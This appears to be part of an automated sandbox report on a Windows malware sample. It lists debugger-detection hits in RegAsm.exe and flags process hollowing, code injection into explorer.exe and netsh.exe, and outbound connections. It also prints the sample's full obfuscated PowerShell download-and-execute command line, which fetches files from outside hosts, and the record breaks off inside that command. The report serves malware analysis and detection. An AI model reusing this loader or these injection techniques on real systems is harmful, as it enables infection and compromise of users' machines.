Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D3740 mov eax, dword ptr fs:[00000030h] 6_2_030D3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D3740 mov eax, dword ptr fs:[00000030h] 6_2_030D3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D3740 mov eax, dword ptr fs:[00000030h] 6_2_030D3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03193749 mov eax, dword ptr fs:[00000030h] 6_2_03193749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C0750 mov eax, dword ptr fs:[00000030h] 6_2_030C0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB765 mov eax, dword ptr fs:[00000030h] 6_2_030BB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB765 mov eax, dword ptr fs:[00000030h] 6_2_030BB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB765 mov eax, dword ptr fs:[00000030h] 6_2_030BB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB765 mov eax, dword ptr fs:[00000030h] 6_2_030BB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C8770 mov eax, dword ptr fs:[00000030h] 6_2_030C8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F78A mov eax, dword ptr fs:[00000030h] 6_2_0317F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C07AF mov eax, dword ptr fs:[00000030h] 6_2_030C07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031937B6 mov eax, dword ptr fs:[00000030h] 6_2_031937B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314F7AF mov eax, dword ptr fs:[00000030h] 6_2_0314F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314F7AF mov eax, dword ptr fs:[00000030h] 6_2_0314F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314F7AF mov eax, dword ptr fs:[00000030h] 6_2_0314F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314F7AF mov eax, dword ptr fs:[00000030h] 6_2_0314F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314F7AF mov eax, dword ptr fs:[00000030h] 6_2_0314F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031497A9 mov eax, dword ptr fs:[00000030h] 6_2_031497A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030ED7B0 mov eax, dword ptr fs:[00000030h] 6_2_030ED7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C57C0 mov eax, dword ptr fs:[00000030h] 6_2_030C57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C57C0 mov eax, dword ptr fs:[00000030h] 6_2_030C57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C57C0 mov eax, dword ptr fs:[00000030h] 6_2_030C57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031407C3 mov eax, dword ptr fs:[00000030h] 6_2_031407C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E27ED mov eax, dword ptr fs:[00000030h] 6_2_030E27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E27ED mov eax, dword ptr fs:[00000030h] 6_2_030E27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E27ED mov eax, dword ptr fs:[00000030h] 6_2_030E27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CD7E0 mov ecx, dword ptr fs:[00000030h] 6_2_030CD7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C47FB mov eax, dword ptr fs:[00000030h] 6_2_030C47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C47FB mov eax, dword ptr fs:[00000030h] 6_2_030C47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D260B mov eax, dword ptr fs:[00000030h] 6_2_030D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D260B mov eax, dword ptr fs:[00000030h] 6_2_030D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D260B mov eax, dword ptr fs:[00000030h] 6_2_030D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D260B mov eax, dword ptr fs:[00000030h] 6_2_030D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D260B mov eax, dword ptr fs:[00000030h] 6_2_030D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D260B mov eax, dword ptr fs:[00000030h] 6_2_030D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D260B mov eax, dword ptr fs:[00000030h] 6_2_030D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F1607 mov eax, dword ptr fs:[00000030h] 6_2_030F1607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102619 mov eax, dword ptr fs:[00000030h] 6_2_03102619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FF603 mov eax, dword ptr fs:[00000030h] 6_2_030FF603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E609 mov eax, dword ptr fs:[00000030h] 6_2_0313E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C3616 mov eax, dword ptr fs:[00000030h] 6_2_030C3616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C3616 mov eax, dword ptr fs:[00000030h] 6_2_030C3616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C262C mov eax, dword ptr fs:[00000030h] 6_2_030C262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE627 mov eax, dword ptr fs:[00000030h] 6_2_030DE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F6620 mov eax, dword ptr fs:[00000030h] 6_2_030F6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195636 mov eax, dword ptr fs:[00000030h] 6_2_03195636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F8620 mov eax, dword ptr fs:[00000030h] 6_2_030F8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DC640 mov eax, dword ptr fs:[00000030h] 6_2_030DC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA660 mov eax, dword ptr fs:[00000030h] 6_2_030FA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA660 mov eax, dword ptr fs:[00000030h] 6_2_030FA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F9660 mov eax, dword ptr fs:[00000030h] 6_2_030F9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F9660 mov eax, dword ptr fs:[00000030h] 6_2_030F9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318866E mov eax, dword ptr fs:[00000030h] 6_2_0318866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318866E mov eax, dword ptr fs:[00000030h] 6_2_0318866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F2674 mov eax, dword ptr fs:[00000030h] 6_2_030F2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314368C mov eax, dword ptr fs:[00000030h] 6_2_0314368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314368C mov eax, dword ptr fs:[00000030h] 6_2_0314368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314368C mov eax, dword ptr fs:[00000030h] 6_2_0314368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314368C mov eax, dword ptr fs:[00000030h] 6_2_0314368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C4690 mov eax, dword ptr fs:[00000030h] 6_2_030C4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C4690 mov eax, dword ptr fs:[00000030h] 6_2_030C4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BD6AA mov eax, dword ptr fs:[00000030h] 6_2_030BD6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BD6AA mov eax, dword ptr fs:[00000030h] 6_2_030BD6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FC6A6 mov eax, dword ptr fs:[00000030h] 6_2_030FC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B76B2 mov eax, dword ptr fs:[00000030h] 6_2_030B76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B76B2 mov eax, dword ptr fs:[00000030h] 6_2_030B76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B76B2 mov eax, dword ptr fs:[00000030h] 6_2_030B76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F66B0 mov eax, dword ptr fs:[00000030h] 6_2_030F66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F16CF mov eax, dword ptr fs:[00000030h] 6_2_030F16CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA6C7 mov ebx, dword ptr fs:[00000030h] 6_2_030FA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA6C7 mov eax, dword ptr fs:[00000030h] 6_2_030FA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CB6C0 mov eax, dword ptr fs:[00000030h] 6_2_030CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CB6C0 mov eax, dword ptr fs:[00000030h] 6_2_030CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CB6C0 mov eax, dword ptr fs:[00000030h] 6_2_030CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CB6C0 mov eax, dword ptr fs:[00000030h] 6_2_030CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CB6C0 mov eax, dword ptr fs:[00000030h] 6_2_030CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CB6C0 mov eax, dword ptr fs:[00000030h] 6_2_030CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F6C7 mov eax, dword ptr fs:[00000030h] 6_2_0317F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031816CC mov eax, dword ptr fs:[00000030h] 6_2_031816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031816CC mov eax, dword ptr fs:[00000030h] 6_2_031816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031816CC mov eax, dword ptr fs:[00000030h] 6_2_031816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031816CC mov eax, dword ptr fs:[00000030h] 6_2_031816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F36EF mov eax, dword ptr fs:[00000030h] 6_2_030F36EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E6F2 mov eax, dword ptr fs:[00000030h] 6_2_0313E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E6F2 mov eax, dword ptr fs:[00000030h] 6_2_0313E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E6F2 mov eax, dword ptr fs:[00000030h] 6_2_0313E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E6F2 mov eax, dword ptr fs:[00000030h] 6_2_0313E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031406F1 mov eax, dword ptr fs:[00000030h] 6_2_031406F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031406F1 mov eax, dword ptr fs:[00000030h] 6_2_031406F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317D6F0 mov eax, dword ptr fs:[00000030h] 6_2_0317D6F0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E33CED _wcsicmp,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,PrintMessageFromModule,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,memcpy,memcpy,FreeLibrary,GetProcessHeap,HeapFree, 8_2_00E33CED
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E396E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00E396E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E39930 SetUnhandledExceptionFilter, 8_2_00E39930

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.19 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.198.239.29 80 Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7876.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR
.NET source code references suspicious native API functions
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe NtClose: Indirect: 0x301A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe NtQueueApcThread: Indirect: 0x301A4F2 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe NtQueueApcThread: Indirect: 0x144A4F2 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe NtClose: Indirect: 0x144A56C
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread register set: target process: 3964 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread register set: target process: 3964 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3964 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: E30000 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F97008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQB